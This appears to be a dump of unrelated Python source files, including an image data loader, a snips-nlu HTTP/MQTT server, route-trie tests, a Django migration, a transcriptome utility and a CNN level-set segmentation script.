dtype='int32') def train_buffer(self, new_flip_noise=None): """ Yields a x_cache_block, has a size that is a multiple of training batches """ if new_flip_noise: self.train_set_flipper.reset_noise(new_flip_noise) train_dataset = self.train_dataset or self.setup_train_dataset() x_cache_block = numpy.zeros(((self.cache_size,) + self.image_shape), dtype=theano.config.floatX) n_cache_blocks = int(len(train_dataset["y"]) / float(self.cache_size)) # rounding down skips the leftovers if not n_cache_blocks: raise ValueError("Train dataset length %i is too small for cache size %i" % (len(train_dataset["y"]), self.cache_size)) for ith_cache_block in xrange(n_cache_blocks): ith_cache_block_end = (ith_cache_block + 1) * self.cache_size ith_cache_block_slice = slice(ith_cache_block * self.cache_size, ith_cache_block_end) for i, image in enumerate(train_dataset["X"][ith_cache_block_slice]): x_cache_block[i, ...] = self.feed_image(image, self.train_image_dir, self.train_crop_lambda, self.train_flip_lambda, self.train_color_cast_lambda) yield numpy.rollaxis(x_cache_block, 3, 1), numpy.array(train_dataset["y"][ith_cache_block_slice], dtype='int32') def test_buffer(self): """ Yields a x_cache_block, has a size that is a multiple of training batches """ x_cache_block = numpy.zeros(((self.cache_size,) + self.image_shape), dtype=theano.config.floatX) n_full_cache_blocks, n_leftovers = divmod(len(self.test_dataset["X"]), self.cache_size) if not n_full_cache_blocks: raise ValueError("Test dataset length %i is too small for cache size %i" % (len(self.test_dataset["X"]), self.cache_size)) for ith_cache_block in xrange(n_full_cache_blocks): ith_cache_block_end = (ith_cache_block + 1) * self.cache_size ith_cache_block_slice = slice(ith_cache_block * self.cache_size, ith_cache_block_end) idxs_to_full_dataset = list(range(ith_cache_block * self.cache_size, ith_cache_block_end)) for i, image in enumerate(self.test_dataset["X"][ith_cache_block_slice]): x_cache_block[i, ...] = self.feed_image(image, self.test_image_dir, self.valid_test_crop_lambda, self.test_flip_lambda, self.test_color_cast_lambda) yield numpy.rollaxis(x_cache_block, 3, 1), numpy.array(idxs_to_full_dataset, dtype='int32') # sneak the leftovers out, padded by the previous full cache block if n_leftovers: leftover_slice = slice(ith_cache_block_end, ith_cache_block_end + n_leftovers) for i, image in enumerate(self.test_dataset["X"][leftover_slice]): idxs_to_full_dataset[i] = ith_cache_block_end + i x_cache_block[i, ...] = self.feed_image(image, self.test_image_dir, self.valid_test_crop_lambda, self.test_flip_lambda, self.test_color_cast_lambda) yield numpy.rollaxis(x_cache_block, 3, 1), numpy.array(idxs_to_full_dataset, dtype='int32') def read_image(self, image_name, image_dir, crop_lambda, extension): """ :type image: string """ as_grey = True if self.image_shape[2] == 1 else False img = imread(image_dir + image_name + extension, as_grey=as_grey) img = self.crop_image(img, crop_lambda) if crop_lambda else img img = img / 255. if len(img.shape) == 2: return img.reshape(img.shape + (1,)) # when grey, img might lack dimension else: return img def preprocess_image(self, image, flip_coords, color_cast): """ Important, use with read_image. This method assumes image is already standardized to have [0,1] pixel values """ image = self.flip_image(image, flip_coords) image = self.color_cast_image(image, color_cast) if not self.mean == None: image = image - self.mean if not self.std == None: image = image / (self.std + 1e-5) return self.amplify * image def crop_image(self, img, crop_lambda): t,b,l,r = crop_lambda(img) assert(b-t == self.image_shape[0]) assert(r-l == self.image_shape[1]) return img[t:b, l:r, :] def color_cast_image(self, image, color_cast, masked=False): if masked: # Observed to perform much worse coloring = numpy.zeros(image.shape) + color_cast mask = (image > 0) / 255. return(image + (mask * coloring)) else: return(image + (color_cast/255.0)) def flip_image(self, image, flip_coords): assert(len(flip_coords) == 2) assert(max(flip_coords) <= 1) assert(min(flip_coords) >= 0) if flip_coords[0] == 1: image = numpy.flipud(image) if flip_coords[1] == 1: image = numpy.fliplr(image) return image def feed_image(self, image_name, image_dir, crop_lambda=None, flip_lambda=None, color_cast_lambda=None): img = self.read_image(image_name, image_dir, crop_lambda, self.image_extension) flip_coords = flip_lambda(image_name) if flip_lambda else numpy.zeros(2) color_cast = color_cast_lambda() if color_cast_lambda else numpy.zeros(self.image_shape[-1]) return self.preprocess_image(img, flip_coords, color_cast) def calc_mean_std_image(self): """ Streaming variance calc: http://math.stackexchange.com/questions/20593/calculate-variance-from-a-stream-of-sample-values Will not look at the validation set images """ print("Calculating mean and std dev image...") mean = numpy.zeros(self.image_shape, dtype=theano.config.floatX) mean_sqr = numpy.zeros(self.image_shape, dtype=theano.config.floatX) N = sum([len(ids) for y, ids in self.train_examples.items()]) # self.train_dataset_size + remainders for y, ids in self.train_examples.items(): for image in ids: img = self.read_image(image, self.train_image_dir, self.pre_train_crop_lambda, self.image_extension) mean += img mean_sqr += numpy.square(img) self.mean = mean / N self.std = numpy.sqrt(numpy.abs(mean_sqr / N - numpy.square(self.mean))) def setup_valid_dataset(self, block): images = [] labels = [] for y, ids in block.items(): for id in ids: images.append(id) labels.append(y) return {"X": images, "y": labels} def setup_train_dataset(self): """ Each self.batch_size of examples follows the same distribution """ bd = BlockDesigner(self.train_examples) if self.sample_class: samp = Sampler(bd.remainder(), seed=self.random_seed) images, labels = samp.custom_distribution(self.sample_class, self.batch_size, self.custom_distribution) return {"X": images, "y": labels} else: blocks = bd.break_off_multiple_blocks(self.n_train_batches, self.batch_size) images = [] labels = [] for block in blocks: for y, ids in block.items(): for id in ids: images.append(id) labels.append(y) return {"X": images, "y": labels} def setup_test_dataset(self): if self.test_image_dir: images = numpy.array([path.splitext(f)[0] for f in listdir(self.test_image_dir) if re.search('\.(jpeg|jpg|png)', f, flags=re.IGNORECASE)]) else: images = [] return {"X": natsort.natsorted(images)}
nilq/baby-python
python
from g2net.input import extract_dict_from_df import pandas as pd import pytest @pytest.mark.parametrize( 'data_dict, key_col, val_col, expected_dict', ( pytest.param( { 'col1': [1, 2, 5], 'col2': [3, 4, 6] }, 'col1', 'col2', { 1: 3, 2: 4, 5: 6 }, id='2-columns-only'), pytest.param( { 'col1': [1, 2, 5], 'col2': [3, 4, 6], 'col3': [-1, -2, -3] }, 'col3', 'col1', { -1: 1, -2: 2, -3: 5 }, id='3-columns'), ) ) def test_extract_dict_from_df(data_dict, key_col, val_col, expected_dict): # Given source_df = pd.DataFrame(data=data_dict) # When result_dict = extract_dict_from_df(source_df, key_col, val_col) # Then assert expected_dict == result_dict
nilq/baby-python
python
# # Copyright (c) 2020 by Philipp Scheer. All Rights Reserved. # # usage: nlu.py [-h] [--config CONFIG] # # Natural language understanding engine using spaCy and RASA # Convert spoken language into a command (skill) and arguments # # optional arguments: # -h, --help show this help message and exit # --config CONFIG Path to jarvis configuration file ## input: jarvis/stt -> command:[words] ## output: jarvis/nlu -> (started|stopped|error|intent:[intent]:probability:[probability]:slots:[slots]) ## import global packages import io, os, sys, time, json, argparse, configparser import urllib.parse as urlparse from http.server import BaseHTTPRequestHandler, HTTPServer ## import local packages import lib.helper as helper import snips_nlu ## set port for webserver port = 1885 class Handler(BaseHTTPRequestHandler): def do_GET(self): global dataset self.send_response(200) self.send_header('Content-type','text/json') self.send_header('Access-Control-Allow-Origin','*') self.end_headers() path = self.path.split("?")[0] arguments = urlparse.parse_qs((urlparse.urlparse(self.path)).query) if path == "/execute": try: cmd = arguments["command"][0] self.wfile.write(json.dumps({"success":True,"message":nlu.parse(cmd)}).encode()) except KeyError: self.wfile.write(json.dumps({"success":False,"message":"need to set 'command' url argument"}).encode()) if path == "/info": try: self.wfile.write(json.dumps({"success":True,"message":dataset}).encode()) except KeyError: self.wfile.write(json.dumps({"success":False,"message":"something went wrong"}).encode()) # this function is being called when the stt engine detects a command def handler(client, userdata, message): global nlp, mqtt data = message.payload.decode() if data.startswith("command:"): command = data.split(":")[1] parsed = nlu.parse(command) mqtt.publish("jarvis/nlu", json.dumps(parsed)) # add a description and parse arguments parser = argparse.ArgumentParser(description="Natural language understanding engine using snips-nlu\nConvert spoken language into a command (skill) and arguments", formatter_class=argparse.RawTextHelpFormatter) parser.add_argument("--config", type=str, help="Path to jarvis configuration file", default="../jarvis.conf") parser.add_argument("--message", type=str, help="A string to run against the NLU (Might take several seconds)") args = parser.parse_args() # get the config file from argparse and read it config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation()) config.read(args.config) config = config["nlu"] if args.message is not None: print(runSnipsOnce(args.message)) exit(0) # initialize mqtt/webserver instance mqtt = helper.MQTT(client_id="nlu.py") mqtt.on_message(handler) mqtt.subscribe("jarvis/stt") server = HTTPServer(('', port), Handler) # mark as started mqtt.publish("jarvis/nlu", "started") # start snips instance with io.open(config["dataset"]) as f: dataset = json.load(f) dataset = helper.transform_dataset(dataset) # log messages helper.log("nlu", "training nlu engine") start = time.time() nlu = snips_nlu.SnipsNLUEngine(dataset) nlu = nlu.fit(dataset) helper.log("nlu", "fininshed training (took {:.2f}s)".format(time.time()-start)) if args.message is not None: parsed = nlu.parse(args.message) print(json.dumps(parsed)) exit(0) # mainloop while True: server.handle_request() mqtt.publish("jarvis/nlu", "stopped")
nilq/baby-python
python
import pickle import pytest from routrie import Router def test_routing() -> None: router = Router( routes={ "/": 0, "/users": 1, "/users/:id": 2, "/users/:id/:org": 3, "/users/:user_id/repos": 4, "/users/:user_id/repos/:id": 5, "/users/:user_id/repos/:id/*any": 6, "/:username": 7, "/*any": 8, "/about": 9, "/about/": 10, "/about/us": 11, "/users/repos/*any": 12, } ) # Matched "/" node = router.find("/") assert node is not None match, params = node assert match == 0 assert params == [] # Matched "/:username" node = router.find("/username") assert node is not None match, params = node assert match == 7 assert params == [("username", "username")] # Matched "/*any" node = router.find("/user/s") assert node is not None match, params = node assert match == 8 assert params == [("any", "user/s")] def test_no_match() -> None: router = Router(routes={"/": 0}) # No match node = router.find("/noway-jose") assert node is None def test_serialization() -> None: router = Router({"/": 0}) router: Router[int] = pickle.loads(pickle.dumps(router)) # No match node = router.find("/noway-jose") assert node is None # Match node = router.find("/") assert node is not None match, params = node assert match == 0 assert params == [] def test_duplicate_route() -> None: router = Router( routes=dict( [ ("/", 0), ("/", 1), ] ) ) # No match node = router.find("/") assert node is not None match, params = node assert match == 1 assert params == [] if __name__ == "__main__": pytest.main()
nilq/baby-python
python
import os import sys sys.path.append(f'{os.getcwd()}/example/bpapi/vendor')
nilq/baby-python
python
# Generated by Django 2.2.11 on 2020-04-09 13:49 from django.db import migrations, models import django.db.models.deletion import wagtail.core.fields class Migration(migrations.Migration): dependencies = [ ('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'), ('contentPages', '0015_auto_20200408_1435'), ] operations = [ migrations.CreateModel( name='ReusableContent', fields=[ ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')), ('name', models.CharField(max_length=100)), ('content_body', wagtail.core.fields.RichTextField(default='')), ], options={ 'verbose_name': 'Content Title', 'verbose_name_plural': 'Content Titles', }, bases=('wagtailcore.page',), ), ]
nilq/baby-python
python
import urllib def assert_urls_match(u1, u2): p1 = urllib.parse.urlparse(u1) p2 = urllib.parse.urlparse(u2) assert p1.scheme == p2.scheme assert p1.netloc == p2.netloc assert p1.path == p2.path assert urllib.parse.parse_qs(p1.query) == urllib.parse.parse_qs(p2.query) class FakeResponse: def __init__(self, text='', status_code=200, url=None): self.text = text self.status_code = status_code self.content = text and bytes(text, 'utf8') self.url = url self.headers = {'content-type': 'text/html'} def __repr__(self): return 'FakeResponse(status={}, text={}, url={})'.format( self.status_code, self.text, self.url) def raise_for_status(self): pass class FakeUrlOpen: def __init__(self, url=None, info=None): self.url_ = url self.info_ = info def __repr__(self): return 'FakeUrlOpenResponse(url={})'.format(self.url) def geturl(self): return self.url_ def info(self): return self.info_ class FakeUrlMetadata: def __init__(self, content_type, content_length): self.content_type = content_type self.content_length = content_length def get(self, prop): if prop.lower() == 'content-length': return self.content_length if prop.lower() == 'content-type': return self.content_type def get_content_maintype(self): return self.content_type.split('/')[0]
nilq/baby-python
python
# -*- coding: utf-8 -*- """Defines `json.JSONEncoder` subclass that makes parsed object (including bytes and bitarray) JSON-serializable """ import bitarray import json import sys class JSONEncoder(json.JSONEncoder): """JSON encoder with additional support for bytes and bitarray Examples: >>> JSONEncoder().encode({"field1": 123}) '{"field1": 123}' >>> JSONEncoder().encode({"field1": b'\x12\x34'}) '{"field1": "1234"}' >>> JSONEncoder().encode({"field1": bitarray.bitarray('01010')}) '{"field1": "01010"}' >>> JSONEncoder(compact_bitarray=True).encode({"field1": bitarray.bitarray('01010')}) '{"field1": {"value": "50", "length": 5}}' >>> JSONEncoder().encode({"field1": {"Type": 567}}) '{"field1": {"Type": 567}}' """ def __init__(self, compact_bitarray=False, *args, **kwargs): super().__init__(*args, **kwargs) self._compact_bitarray = bool(compact_bitarray) def default(self, o): if isinstance(o, (bytes, bytearray)): return o.hex() elif isinstance(o, bitarray.bitarray): if self._compact_bitarray: return {'value': o.tobytes().hex(), 'length': len(o)} else: return o.to01() else: super().default(o)
nilq/baby-python
python
from os.path import getsize from .constants import ATTACHMENT_CONTENT_TYPES from .errors import FastScoreError class Attachment(object): """ Represents a model attachment. An attachment can be created directly but it must (ultimately) associated with the model: >>> att = fastscore.Attachment('att-1', datafile='/tmp/att1.zip') >>> model = mm.models['model-1'] >>> att.upload(model) :param atype: An attachment type. Guessed from the data file name if omitted. :param datafile: The data file. :param model: The model instance. """ def __init__(self, name, atype=None, datafile=None, datasize=None, model=None): self._name = name if atype == None and datafile != None: atype = guess_type(datafile) self._atype = atype if datasize == None and datafile != None: datasize = getsize(datafile) self._datasize = datasize self._datafile = datafile self._model = model @property def name(self): """ An attachment name. """ return self._name @property def atype(self): """ An attachment type. * **zip** A ZIP archive. * **tgz** A gzipped tarball. """ return self._atype @atype.setter def atype(self, atype): assert atype in ATTACHMENT_CONTENT_TYPES self._atype = atype @property def datafile(self): """ A name of the file that contains the attachment data. The attachment is downloaded when this property is first accessed. """ if self._datafile == None: self._datafile = self._model.download_attachment(self._name) return self._datafile @datafile.setter def datafile(self, datafile): self._datafile = datafile if datafile: self._datasize = getsize(datafile) else: self._datasize = None @property def datasize(self): """ The size of the attachment. Checking the attachment size does NOT trigger the download. """ return self._datasize def upload(self, model=None): """ Adds the attachment to the model. :param model: The model instance. Can be None if the model instance has been provided when the attachemnet was created. """ if model == None and self._model == None: raise FastScoreError("Attachment '%s' not associated with a model" % self.name) if self._model == None: self._model = model self._model.save_attachment(self) def guess_type(datafile): if datafile.endswith('.zip'): return 'zip' elif datafile.endswith('.tar.gz'): return 'tgz' elif datafile.endswith('.tgz'): return 'tgz' else: raise FastScoreError("Unable to guess attachment type for '%s'" % datafile)
nilq/baby-python
python
# The Path class represents paths on a graph and records the total path cost class Path: def __init__(self): self.length = 0 self.cost = 0 self.nodes = [] # adds a node to the end of the path def add_node(self, node_label, cost): self.length += 1 self.cost += cost self.nodes.append(node_label) # reverses the path (this is useful when building Paths from child to parent) def reverse(self): self.nodes.reverse() def __str__(self): return " -> ".join(self.nodes) + "\t (Cost: %s)" % self.cost
nilq/baby-python
python
######################################################### # 2020-01-28 13:15:09 # AI # ins: MOV @Ri, A ######################################################### import random from .. import testutil as u from ..sim51util import SIMRAM from ..asmconst import * p = u.create_test() ram = SIMRAM() def test_rs(rs, psw_rs, p): p += ";; set rs" p += atl.move(SFR_PSW, atl.I(psw_rs)) ram.set_direct(SFR_PSW.x, psw_rs) def test_ri(RI, p): indirect = random.getrandbits(8) a = random.getrandbits(8) p += atl.move(atl.D(RI.addr), atl.I(indirect)) p += atl.move(SFR_A, atl.I(a)) p += f'MOV {RI}, A' ram.set_iram(RI.addr, indirect) ram.set_direct(SFR_A.x, a) ram.set_iram(indirect, ram.get_direct(SFR_A.x)) p += atl.aste(RI, atl.I(ram.get_iram(ram.get_direct(RI.addr)))) for x in range(486): p.iter_ri(test_rs, test_ri)
nilq/baby-python
python
import sys, re, hashlib, json, random import GenePredBasics, SequenceBasics from SerializeBasics import encode_64, decode_64 # Transcriptome is a set of genepred entries # with the corresponding fasta file. # alternatively, you can read in a serialized transcriptome. # # You can further define a transcriptome file with an expression file # This file can be of the form of a TSV # class Transcriptome: def __init__(self): self.transcripts = {} self.expression = None self.ref_hash = None def get_serialized(self): a = {} a['transcripts'] = self.transcripts if self.expression: a['expression'] = self.expression.get_serialized() else: a['expression'] = None a['ref_hash'] = self.ref_hash return encode_64(a) def read_serialized(self,input): a = decode_64(input) self.transcripts = a['transcripts'] if a['expression']: self.expression = IsoformExpression() self.expression.read_serialized(a['expression']) else: self.expression = a['expression'] self.ref_hash = a['ref_hash'] def set_reference_genome_dictionary(self,indict): self.ref_hash = indict return # Adds an expression value and updates the rng data def add_expression(self,inname,exp): if not self.expression: self.expression = IsoformExpression() for name in self.transcripts: self.expression.add_expression(name,0) self.expression.add_expression(inname,exp) self.expression.update_expression() # Add an expression value, but you'll have to update it yourself. def add_expression_no_update(self,inname,exp): if not self.expression: self.expression = IsoformExpression() for name in self.transcripts: self.expression.add_expression(name,0) self.expression.add_expression(inname,exp) def update_expression(self): if self.expression: self.expression.update_expression() else: sys.stderr.write("WARNING: expression was not set yet. nothing to update\n") def add_genepred_line(self,inline): if not self.ref_hash: sys.stderr.write("ERROR: Must assign a reference genome dictionary first\n") sys.exit() gpd = GenePredBasics.GenePredEntry(inline) if gpd.value('name') in self.transcripts: sys.stderr.write("WARNING: "+inline+" transcript was already set\n") seq = '' for i in range(0,gpd.value('exonCount')): seq += self.ref_hash[gpd.value('chrom')][gpd.value('exonStarts')[i]:gpd.value('exonEnds')[i]].upper() if gpd.value('strand') == '-': seq = SequenceBasics.rc(seq) self.transcripts[gpd.value('name')] = seq return # This is depreciated #def read_from_fasta_and_genepred(self,genomefastafile,genepredfile): # # read in our genome # seen_names = {} # seen_coords = {} # genepred = {} # with open(genepredfile) as inf: # for line in inf: # if re.match('^#',line): continue # e = GenePredBasics.line_to_entry(line) # hexcoord = hashlib.sha1(e['chrom']+"\t"+e['strand'] + "\t" + str(e['exonStarts'])+"\t" + str(e['exonEnds'])).hexdigest() # dupname = 0 # dupcoord = 0 # if hexcoord in seen_coords: # sys.stderr.write("Warning "+ e['name'] + " " + e['gene_name'] + " exists at identical coordinates as another entry\n") # dupcoord = 1 # seen_coords[hexcoord] = 1 # currname = e['name'] # if e['name'] in seen_names: # if dupcoord == 1: # sys.stderr.write("skipping perfect duplicate of "+e['name']+"\n") # continue # newname = e['name'] + "."+str(len(seen_names[e['name']])+1) # currname = newname # seen_names[e['name']].append(newname) # sys.stderr.write("Warning "+ e['name'] + " " + e['gene_name'] + " is a duplicate name.. renaming to "+newname+ "\n") # dupname = 1 # else: # seen_names[e['name']] = [] # seen_names[e['name']].append(e['name']) # genepred[currname] = e # # #print "reading names and locs" # ref = SequenceBasics.read_fasta_into_hash(genomefastafile) # #print "converting sequences" # for transcript in genepred: # e = genepred[transcript] # if e['chrom'] in ref: # seq = '' # self.transcript_names[transcript] = genepred[transcript]['name'] # for i in range(0,e['exonCount']): # seq += ref[e['chrom']][e['exonStarts'][i]:e['exonEnds'][i]] # if e['strand'] == '-': seq = SequenceBasics.rc(seq) # self.transcripts[transcript] = seq.upper() # self.gpds[transcript] = e # Pre: Expression must have been set # Post: Returns a random transcript name def get_random_by_expression(self): return self.expression.get_random_by_expression() def get_uniform_random(self): tnames = self.transcripts.keys() tnum = len(tnames) rnum = random.randint(0,tnum-1) return tnames[rnum] # Default to random by expression if its set def get_random(self): if self.expression: return self.get_random_by_expression() return self.get_uniform_random() def get_sequence(self,name): if name not in self.transcripts: sys.stderr.write("ERROR: "+name+" not in transcripts\n") sys.exit() return self.transcripts('name') # Class holds the isoform names and expression values # And also has functions for randomly getting an isoform name # either by uniform distribution or class IsoformExpression: def __init__(self): self.expression = {} self.total_expression = None self.names = None return # Pre: TSV with <transcript name> <expression level> def read_tsv(self,filename): with open(filename) as inf: for line in inf: f = line.rstrip().split("\t") self.expression[f[0]]=float(f[1]) self.update_expression() def get_expression(self,transcript_name): if transcript_name not in self.expression: sys.stderr.write("ERROR: "+transcript_name+" not in expression") sys.exit() return self.expression[transcript_name] # Add a single expression value, you need to update_expression in order to set rng things def add_expression(self,transcript_name,expression): self.expression[transcript_name] = expression def read_serialized(self,instring): self.expression = decode_64(instring) self.update_expression() def get_serialized(self): return encode_64(self.expression) def get_random_by_expression(self): rnum = random.random() total = 0 for name in self.names: total += self.expression[name]/self.total_expression if rnum < total: return name return name def get_uniform_random(self): rnum = random.randint(0,len(self.names)-1) return self.names[rnum] def update_expression(self): self.names = sorted(self.expression.keys()) self.total_expression = sum([self.expression[x] for x in self.expression])
nilq/baby-python
python
from cnnlevelset.pascalvoc_util import PascalVOC from cnnlevelset.localizer import Localizer from cnnlevelset import config as cfg from collections import defaultdict import tensorflow as tf import keras.backend as K import numpy as np import matplotlib.pyplot as plt import sys import time tf.python.control_flow_ops = tf pascal = PascalVOC(cfg.PASCAL_PATH) X_img_test, X_test, y_test, y_seg = pascal.get_test_data(10000, False) cls_y_test = y_test[:, :, 0] N = float(X_img_test.shape[0]) localizer = Localizer(model_path=cfg.MODEL_PATH) start = time.time() cls_preds, bbox_preds = localizer.predict(X_test) end = time.time() print('CNN time: {:.4f}'.format(end - start)) print('Average: {:.4f}'.format((end - start) / N)) cls_acc = np.mean(np.argmax(cls_preds, axis=1) == np.argmax(cls_y_test, axis=1)) print(cls_acc) K.clear_session() from cnnlevelset.segmenter import * if len(sys.argv) > 1 and sys.argv[1] == 'show': show = True else: show = False bbox_res, border_res, cnn_res = defaultdict(list), defaultdict(list), defaultdict(list) i = 0 for img, y, cls_pred, bbox_pred, ys in zip(X_img_test, y_test, cls_preds, bbox_preds, y_seg): if show: label = pascal.idx2label[np.argmax(cls_pred)] print(label) img = img.reshape(224, 224, 3) plt.imshow(pascal.draw_bbox(img, bbox_pred)) plt.show() phi = phi_from_bbox(img, bbox_pred) levelset_segment_theano(img, phi=phi, sigma=5, v=1, alpha=100000, n_iter=80, print_after=80) input() else: start = time.time() phi = phi_from_bbox(img, bbox_pred) mask = (phi < 0) end = time.time() bbox_res['time'].append(end - start) bbox_res['accuracy'].append(pascal.segmentation_accuracy(mask, ys)) p, r, f1 = pascal.segmentation_prec_rec_f1(mask, ys) bbox_res['precision'].append(p) bbox_res['recall'].append(r) bbox_res['f1'].append(f1) start = time.time() phi = default_phi(img) mask = levelset_segment_theano(img, phi=phi, sigma=5, v=1, alpha=100000, n_iter=80) end = time.time() border_res['time'].append(end - start) border_res['accuracy'].append(pascal.segmentation_accuracy(mask, ys)) p, r, f1 = pascal.segmentation_prec_rec_f1(mask, ys) border_res['precision'].append(p) border_res['recall'].append(r) border_res['f1'].append(f1) start = time.time() phi = phi_from_bbox(img, bbox_pred) mask = levelset_segment_theano(img, phi=phi, sigma=5, v=1, alpha=100000, n_iter=80) end = time.time() cnn_res['time'].append(end - start) cnn_res['accuracy'].append(pascal.segmentation_accuracy(mask, ys)) p, r, f1 = pascal.segmentation_prec_rec_f1(mask, ys) cnn_res['precision'].append(p) cnn_res['recall'].append(r) cnn_res['f1'].append(f1) i += 1 print(i) if not show: for metric in ['accuracy', 'precision', 'recall', 'f1']: print(metric) print('----------------') print('Bbox: {}'.format(np.mean(bbox_res[metric]))) print('Border: {}'.format(np.mean(border_res[metric]))) print('CNN: {}'.format(np.mean(cnn_res[metric]))) print() print('Time') print('---------------------') print('Bbox: {}'.format(np.mean(bbox_res['time']))) print('Border: {}'.format(np.mean(border_res['time']))) print('CNN: {}'.format(np.mean(cnn_res['time']))) print()
nilq/baby-python
python
a''' Created on 6-feb-2017 Modified the 20170321, by EP @author: roncolato ''' import numpy as np import scipy.interpolate as interpol from sherpa.training.step1 import from7to28 as f7 from sherpa.training.step1 import quant as q from sherpa.training.step1 import EquaPrec as ep from sherpa.training import EquaIndic as ei from sherpa.training.step1 import nlparci as nlpa from sherpa.training.step1 import InvDistN_opt_prec as inv from sherpa.training.step1 import nlinfit as nlin def step1_potency(conf): prctileVec1=np.array([35, 35, 35, 35, 35]); prctileVec2=np.array([70, 70, 70, 70, 70]); categories=np.array([1,2,3]) #convert from 28 to 7 km Prec = f7.from7to28(conf.Prec); ny = int(conf.ny/4); nx = int(conf.nx/4); rad = conf.radStep1; nPrec = conf.nPrec; rf = conf.rf; flagRegioMat = np.copy(conf.flagRegioMat); #pad Prec with zeros around initial matrix, to perform matrix products later on Prec2 = np.zeros((ny+rad*2,nx+rad*2,Prec.shape[2],Prec.shape[3])); Prec2[rad:-rad,rad:-rad,:,:] = Prec[:,:,:,:]; Prec=Prec2; #convert from 28 to 7 km Indic = f7.from7to28(conf.Indic); flagRegioMat = f7.from7to28(flagRegioMat); #initialize variables omega = np.full([ny,nx,nPrec],np.nan); alpha = np.full([ny,nx,nPrec],np.nan); ci2 = np.empty((categories.size,nPrec), dtype=object); CovB2 = np.empty((categories.size,nPrec), dtype=object); alphaTmp = np.zeros((categories.size)); omegaTmp = np.zeros((categories.size)); #define training scenarios; note scenarios number is +1 if checking DoE...as in line 74 it is -1 if conf.domain == 'emep10km': if conf.aqi == 'SURF_ug_PM25_rh50-Yea': IdeVec = (np.array([1, 1]),np.array([1, 2]),np.array([1, 3]),np.array([1, 5]),np.array([1, 6])); elif conf.aqi == 'SURF_ug_PM10_rh50-Yea': IdeVec = (np.array([1, 1]),np.array([1, 2]),np.array([1, 3]),np.array([1, 4]),np.array([1, 6])); elif conf.domain == 'ineris7km': IdeVec = (np.array([1, 8]),np.array([1, 9]),np.array([1, 10]),np.array([1, 11]),np.array([1, 12])); #loop over precursors for precursor in range(0, nPrec): PREC = precursor; Ide = IdeVec[precursor]; icel = 0; #intialize variables PrecPatch = np.zeros((nx*ny,(rad*2+1)**2)); IndicEq = np.zeros((nx*ny,1)); indexUsed = np.full((nx*ny,1),np.nan);#np.zeros((nx*ny,1)); potency=np.full((ny,nx),np.nan);#np.zeros((ny,nx)); print('precursor: '+str(PREC)); #loop over cells to create groups for ic in range(0, nx): #print(PREC, ic); for ir in range(0, ny): if flagRegioMat[ir,ic]>0: #create data for omega calculation nSc = Ide.shape[0]-1;# size(Ide,2)-1 tmpPrec = ep.EquaPrec(ic,ir,rf,nx,ny,nSc,Prec.shape[3],Prec[:,:,Ide[1],PREC],rad); # patches tmpInde = ei.EquaIndic(ic,ir,rf,nx,ny,nSc,Indic[:,:,Ide[1]]); # indicator x0=np.array([1, 2]); [inp2_aggemi]= inv.InvDistN_opt_prec(x0,tmpPrec,rad); #store data for omega calculation potency[ir,ic]=tmpInde/inp2_aggemi; prc1=np.percentile(potency[np.isfinite(potency)],prctileVec1[precursor]); prc9=np.percentile(potency[np.isfinite(potency)],prctileVec2[precursor]); speed=potency.copy(); speed[np.isnan(speed)]=0 potency[speed<prc1]=1; potency[(speed>=prc1) & (speed<prc9)]=2; potency[speed>=prc9]=3; val=categories; for ic in range(0, nx): #print(PREC, ic); for ir in range(0, ny): if flagRegioMat[ir,ic]>0: #variable to store which group ot be considered indexUsed[icel] = np.where(val==potency[ir,ic]); #create data for omega calculation nSc = Ide.shape[0]-1;# size(Ide,2)-1 tmpPrec = ep.EquaPrec(ic,ir,rf,nx,ny,nSc,Prec.shape[3],Prec[:,:,Ide[1],PREC],rad); # patches tmpInde = ei.EquaIndic(ic,ir,rf,nx,ny,nSc,Indic[:,:,Ide[1]]); # indicator #store data for omega calculation PrecPatch[icel,:] = tmpPrec; #np.squeeze(tmpPrec) IndicEq[icel] = tmpInde; icel = icel+1; indexUsedLin = np.reshape(indexUsed, -1, order='F'); #compute omega for each group of cells, given precursor p for i in range(val.size): x0 = [1, 2]; ind = np.where(indexUsedLin==i)[0]; inp1 = PrecPatch[ind,:]; inp2 = IndicEq[ind]; iop = lambda inp1,beta1,beta2: inv.InvDistN_opt_prec([beta1,beta2],inp1,rad); [mdl,r,J,CovB] = nlin.nlinfit(iop,inp1,inp2.ravel(),x0); ci2[i,PREC] = nlpa.nlparci(r,J); CovB2[i,PREC] = CovB; alphaTmp[i] = mdl[0]; omegaTmp[i] = mdl[1]; #repeat result for each belonging to a given group for ic in range(0, nx): for ir in range(0, ny): if flagRegioMat[ir,ic]>0: indexUsed = np.where(val==potency[ir,ic])[0]; alpha[ir,ic,PREC] = alphaTmp[indexUsed]; omega[ir,ic,PREC] = omegaTmp[indexUsed]; del(PrecPatch,IndicEq,indexUsed,potency,speed) #rescale to initial spatial resolution, through nearest interpolation #initialize variable omegaFinal = np.zeros((conf.Prec.shape[0],conf.Prec.shape[1],5)); #loop on precursors for i in range(0, nPrec): #define interpolator object xgv = np.arange(1., conf.Prec.shape[0]/4+1); ygv = np.arange(1., conf.Prec.shape[1]/4+1); F=interpol.RegularGridInterpolator((xgv, ygv), omega[:,:,i],method='nearest',bounds_error=False, fill_value=None); #interpolate Xq = np.arange(1., conf.Prec.shape[0]/4+1, 1/4); Yq = np.arange(1., conf.Prec.shape[1]/4+1, 1/4); [Y2,X2] = np.meshgrid(Yq, Xq); pts=((X2.flatten(),Y2.flatten())) omegaFinal[:,:,i] = F(pts).reshape(conf.Prec.shape[0],conf.Prec.shape[1]) print('precursor interpolated: '+str(i)); #store final results conf.omegaFinalStep1 = omegaFinal; conf.ci2Step1 = ci2; conf.CovB2Step1 = CovB2;
nilq/baby-python
python
